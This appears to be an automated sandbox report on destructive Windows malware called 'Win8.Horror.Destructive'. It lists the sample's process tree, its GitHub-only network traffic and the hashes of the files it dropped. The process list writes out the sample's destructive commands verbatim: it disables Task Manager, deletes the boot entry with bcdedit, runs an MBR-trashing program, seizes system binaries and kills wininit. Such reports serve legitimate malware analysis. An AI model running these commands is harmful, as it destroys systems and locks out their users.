"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:8

C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe

"C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\438C.tmp\438D.tmp\438E.vbs //Nologo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\438C.tmp\Horror8.bat" "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\bcdedit.exe

bcdedit /delete {current}

C:\Users\Admin\AppData\Local\Temp\438C.tmp\TrashMBR.exe

TrashMBR.exe

C:\Windows\system32\taskkill.exe

taskkill /f /im taskmgr.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\taskmgr.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\taskmgr.exe /grant Admin:F

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F

C:\Windows\system32\taskkill.exe

taskkill /f /im logonui.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\logonui.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\logonui.exe /grant Admin:F

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\logonui.exe /grant "everyone":F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\explorer.exe

C:\Windows\system32\icacls.exe

icacls C:\Windows\explorer.exe /grant Admin:F

C:\Windows\system32\icacls.exe

icacls C:\Windows\explorer.exe /grant "everyone":F

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\438C.tmp\music.vbs"

C:\Users\Admin\AppData\Local\Temp\438C.tmp\HorrorGui.exe

HorrorGui.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x500 0x2f4

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im wininit.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6200551882998235220,5271982580265869737,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5024 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 8.8.8.8:53 21.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 20.26.156.210:443 api.github.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e443ee4336fcf13c698b8ab5f3c173d0
SHA1 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA256 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512 cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

\??\pipe\LOCAL\crashpad_1692_EPXUTZSKLVWTJMRY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56a4f78e21616a6e19da57228569489b
SHA1 21bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256 d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512 c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 77c00fa6740e3b28df077c2a0ab1fad3
SHA1 4a83d53d20f1321eaf31a59fbfb0f2acf3ecc4fc
SHA256 8328b05ed4f29480a54c09efe8174dacafd4542682b2e4efcbcc32edcf5e32ff
SHA512 9de7e37c159d729f3c8db4f74de885f3534f3a990f8f22e022ee3ff1d280c97d644e27d65c047375bde2b38c3c4837fd9da20188344cb759ef3ce30ade796ab5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 409d59929fa3a3f7cb804332de0714be
SHA1 c54f9e9ce40f7cf10da04ef3165cf47ea35bf97c
SHA256 549877c70613e7077d293b6cce7f30b06ed2dd2737aafdf271a03f2f2590419a
SHA512 a7ae2ae423a20632426f9b098567ed1fb7f8e8c3e58389c9dce8271f6917f372a45767a84cd29d4d0b63f52e0e9ce4ee2d92c0aaef1e570ca9012255e1bba48e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5cb66de64ac9b603f2a464dcf318fead
SHA1 ca25e488f5b3592f12b7e5003843c08940a9afc2
SHA256 7bc0adc466136c03fbd9c341a92940339f4883feab811b7d852429b3add03536
SHA512 1257320011c59be4e766c2a318032047822c3eae2e9f3b3afc24eb33f01c6b82693b057d375933035e31624012dda109e1276b291b3fe04bf7f712e0660f48a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 807419ca9a4734feaf8d8563a003b048
SHA1 a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256 aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512 f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a22ed3b1f345d9b03d3d74c71825905d
SHA1 6182cd035e244a0238e13f6367b7f534856b7a7d
SHA256 01847a9ec3cbd0dd1044be67db2302676a442f6a8872d833f5d0ab17a3d1cc9a
SHA512 84943580d63bbe4cb81d74ba902d8b52f494a09fb488ad50dba6ffca7040052c893ecb2f5782a480f6d5e320c3dfc74e9c45e11891fc26d17bd9727a2af9045e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c6bb.TMP

MD5 71a8c8a76bd13dae79ab6ea2162b7c80
SHA1 50700d645ce8336b99f5aaf640080cd53251a429
SHA256 e0de0c81e8f2351ad20fa48783f8242d54004e456f2e8cff31f4dae07a9576c2
SHA512 0bf69e21c4583596c69a38bd43ce23eca05176f34e0c8666e669d6d968c0bcdd83ea5847b6a3443600e418020bdb7b96e6cb20e5f7050a76ec1be610be4b7dc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8e12d30082b5901b9d9d7a1fcc1f4722
SHA1 e4cdf8ce8fdc8ca9355e8084045ea7bc1420bca5
SHA256 6fbf224bbd8629cd1dd645af3945bb1bfe5ccff83aee3a690bdfcc073cbd15ed
SHA512 275a9540310f56009e4db878c36b0e49369535a8958e0a4bdeade8d8515799d38e520f8eb6f5031c2a678a91dc554464ebf324066a351f80120857f59aa9e8c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0004dfc2e14dd6138e9d1a1af29c069c
SHA1 1f147794355213dfbf5c08df616be334101851c9
SHA256 d443de4d8324d2e82ef290e571bdae13ad1bce9b4235874ebce4e3125a28c6b2
SHA512 771d58d22738bce6d0b93ad789b20fa8b015bc806dddad6bb1fff2cfb79766e3f323392480335754db69e9b695b14644381c0bc0b2cf3095f69a0fe5a46587d2

C:\Users\Admin\Downloads\Unconfirmed 60212.crdownload

MD5 846d847d9b1247c57824d5d2601a7faf
SHA1 2119dccee1e98af31fd193cf38bbfd8614f183bb
SHA256 ba8fa2c240edfc35c3078fcf31b87c0e1af4404dfc1f52e0d5640edb061355fc
SHA512 8cbad0562c13f997fd2e90e6f3a998cdbd2c207592c1d85e6bcf5c794a65bbf2322355a33c9d1af4f03519447c397e7b34dfea179c30d1a054d32d6031c723ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 90a622431f575345897cf77817a995b1
SHA1 27f0b4c4a808109f5947a10d0c44eaaf00882757
SHA256 83af7d1e3aa2d93d1befe2811a960d782aecf3700e610f4ac2f64d5ff8cb6822
SHA512 145d165e75c411b77ede0d3cf9685b50bf1001cd894e0c3b0d0574c1b9b439c65dd5d7a5338a7cbc987e9c075a8ee9dff7c6d0f15c4ad431e683adf39eeb6c99

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8ba2554452cd898e15235ea600577f90
SHA1 82974040b04e3cb34d6a2bc480657bc0e7d79088
SHA256 8c7a9f5bf836b768e104fba6ed34f80f6702adf9adf2505320faf04dd19c1a1f
SHA512 812b0e1efe78aa93de45c63304f685e50b298f819b95994bff0563e642d8f3ed0a9b4d6eabd8139dd9b1904f7daa86f2ed19255a4d688a576b83706fcbfb141c

C:\Users\Admin\AppData\Local\Temp\438C.tmp\438D.tmp\438E.vbs

MD5 3bafc447cf86b66198f84690cb592adb
SHA1 5d16e560003b0ca1efa914aa0960fa84dbe1a0a6
SHA256 b96a442adc718e9e0981b1c3bea2c8172f6c5b2c8c1fecda5c311c95728bafff
SHA512 f0aaef88ff735c8823cf83bf513a95084ccc617aa97bfed8ee86dc1366ae8cef679a7b5bf48116370493e0074fd7f56ce7e5e9f22bfbd8dd6f2f7c8489419700

C:\Users\Admin\AppData\Local\Temp\438C.tmp\Horror8.bat

MD5 36fcf85ec52716f5fd8ea625a11c13c6
SHA1 60a720249c6bb3617e904445c247487dba96af9c
SHA256 3aba2d676284209730ff20b28a8415a3c41c88f402301b14437040bf2baebe0c
SHA512 1ba72a3ea4cf1014f0072184067611448276fff273f803c829d1f6bbeb6dd24c7dca41eada5b78f2ddc7dabadf5c5a66e11cd4f8a5aea31d261a69ef186d09f6

C:\Users\Admin\AppData\Local\Temp\438C.tmp\TrashMBR.exe

MD5 87f09f4a202bf9c0adcf6fed942aa703
SHA1 96bf11ff017e31ec2242c0024c372628c40cbd4f
SHA256 acf8abe9bd2f61840a247b4796ebedad20f69a85dbdf8a4100f5d7d306b064b1
SHA512 85202719aa875b2697ae3082a79a3ca7c1e1be377d6b19f9f159488a5f9d6ec6e9ec35352b067a1bc15546165764acb108c11203bf482ea43684e433717eee58

memory/4588-310-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 63d94e9846e570803ecf07d6d8f086f5
SHA1 d2c6997f90bf62df74867b6c83a2dff8e6bf7a55
SHA256 b848a82f7fbf217a442db0b47389db16d9040325b5f031d3a0722115a3e5f9d4
SHA512 12b7036056049698bcf8b9979dc48dff770c45b6f57747d50920ded43e4f08f02add7c099a4ab2a5f1b3edb6653d0f5843cb45e845c7c916312acb3fa83149c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b8fdc8d04b83beb089126efbce00f896
SHA1 971ff6e70884b2cdf229be5a0cad066e3bdb085b
SHA256 c3084bc354488bb98cea934da0e3d6a462b574774df7f3b4fe289688acf3ebfe
SHA512 f5f0033e6bc47a723773fb221dbb2d5b684209ffc7a8046e708df1f5cade52b05158d2fc09fdb3867ca1922734f64fc5cb3bb7224da24df348085092385a45fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3b387466e157315db8e665a9a03417af
SHA1 32ff587946f4376599289f2558dacf78eb6c2a06
SHA256 8b00f139a63a060030c192b67c0fbf934efb13efb618742f33a36b477aa88f7a
SHA512 211718a1bba3edc66fa39afe65153e7fa3ba706e964c80d5cd5c7038df7a366bb126f99661dc10e797f03cb2ac28d9b919976a2d76837ecde295e5d867f3bdf7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 803bab4a9b5f6aeee90f7b2cd7fcd703
SHA1 34621885b73bf45144fcbeefcc2eb40ef6a5832a
SHA256 82eecaaaee373b018a67d059881abe08c7534f9088a6b107c52861ee082ce24a
SHA512 55da4f30b766638e46e79d7fd3a7f3458ec07f6795ae0687432e4d9cb9cdbbcd545cd721d5c7495863d13f68ade989d69ec1e0c88c5817f04057917d052aaaa2

C:\Users\Admin\AppData\Local\Temp\438C.tmp\music.vbs

MD5 8b703f9c48eb3724348af746e7610061
SHA1 599aa1820096e92546ea8d863d46cc49404e19e6
SHA256 e8cd555c43973e3b2e6fa0e80d602abc3d7c43a17bc51a6d0ba08e20ea3feadd
SHA512 d38e39e3f9ff71f68d3d851b635bcc27939656ec085369652a324d8b0c95042e722a07b0b06a0a25f0f2b51d5ad1addc3174c472bda3f86cbf28376ba4870208

C:\Users\Admin\AppData\Local\Temp\438C.tmp\HorrorGui.exe

MD5 b2653aa06a2253e8155eb81535b20e6a
SHA1 0cf61fc537d8d73c71724febd0f1f34a6fddc838
SHA256 b4e106e22c4d3e51c87d3d5853298210572ab2834f5e2a0beaf1df7d96c57d29
SHA512 143694740660ac46f0c6c78903e8378fd402b5338dfb68c3e4a148f6f83036eaea3be6bda160d59ed1c5b52ba235823e284a0564ab9dbedcc3d3a6e40584fd98

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Temp\438C.tmp\clingclang.wav

MD5 1c723b3b9420e04cb8845af8b62a37fa
SHA1 3331a0f04c851194405eb9a9ff49c76bfa3d4db0
SHA256 6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29
SHA512 41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 987a07b978cfe12e4ce45e513ef86619
SHA1 22eec9a9b2e83ad33bedc59e3205f86590b7d40c
SHA256 f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8
SHA512 39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c330c4a29b48cc00d9bec985495495d8
SHA1 363b7072aeafe5e40220fe8a8bf0dbf71350718c
SHA256 2b49ef9f11a9b9034be544b3ec2a02ff7db592f3fb3d0fe0f70bf7e497d7ee98
SHA512 36cc0ad2648f2bef7674968cf194ec6ca26e5d66c255ec26553b58041855525eb89d29dce4e465960e695bcaedcdfead1d208ebd9b4962f7aad1ff71681e5dbd